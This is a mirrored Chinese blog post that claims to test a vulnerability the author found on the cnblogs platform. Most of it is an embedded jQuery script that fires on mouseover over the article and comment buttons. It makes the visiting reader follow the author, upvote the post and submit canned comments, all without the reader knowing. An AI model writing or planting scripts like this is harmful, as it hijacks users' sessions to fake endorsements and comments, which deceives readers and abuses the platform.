zoukankan      html  css  js  c++  java
  • JQuery果然是神器,这里顺便测试一下我发现的那个漏洞! 人工智能

    JQuery果然是神器,这里顺便测试一下我发现的那个漏洞!

    所以这里一段呢会填充一些无关紧要的东西,比如我把那段JavaScript放在这里:

    <script type="text/javascript">// <![CDATA[
     
             $(function() {
             $("#Content").mouseover(function() {
                 c_follow();
                 $("div[class=diggit]").trigger('click');
                 $("textarea[class=comment_textarea]").val("真的是这样,楼主所说属实!" + Math.random());            
                 PostComment();
                 });
             $("input[name=commentbutton1]").mouseover(function() {
                 $("div[class=diggit]").trigger('click');
                 $("textarea[class=comment_textarea]").val("此文不错,值得推荐!");
                     PostComment();
                 });
          $("input[name=commentbutton2]").mouseover(function() {
                  c_follow();
                 $("textarea[class=comment_textarea]").val("期待后续文章,关注!");
                     PostComment();
                 });
                 $("input[name=commentbutton3]").mouseover(function() {
                 $("textarea[class=comment_textarea]").val("继续努力,加油!");
                     PostComment();
                 });
                 $("input[name=commentbutton4]").mouseover(function() {
                 $("textarea[class=comment_textarea]").val("不完全赞同,有争议!");
                     PostComment();
                 });
                 $("input[name=commentbutton5]").mouseover(function() {
                 $("textarea[class=comment_textarea]").val("不同意楼主观点,拍砖!");
                     PostComment();
                 });
                 $("input[name=commentbutton6]").mouseover(function() {
                      
                     $("textarea[class=comment_textarea]").val("飘过~~");
                     PostComment();
                 });
             });
    // ]]></script>
    

    本文主要是想看下效果,并无恶意。

    转载请注明出处:www.cnblogs.com/DSharp 欢迎加关注 呵呵 
    反馈文章质量,你可以通过快速通道评论:
         

     

  • 相关阅读:
    apply call this arguments caller callee
    JavaScript 小刮号
    asp.net底层http管道
    JavaScript 使用方括号([])引用对象的属性和方法 createDelegate
    MSIL条件跳转(简单注释)
    微软MVP手把手教你如何修改.NET Framework
    简单操作IL文件
    Remoting入门实例
    AutoResetEvent和ManualResetEvent用法示例
    AutoResetEvent和ManualResetEvent用法
  • 原文地址:https://www.cnblogs.com/DSharp/p/1902702.html
Copyright © 2011-2022 走看看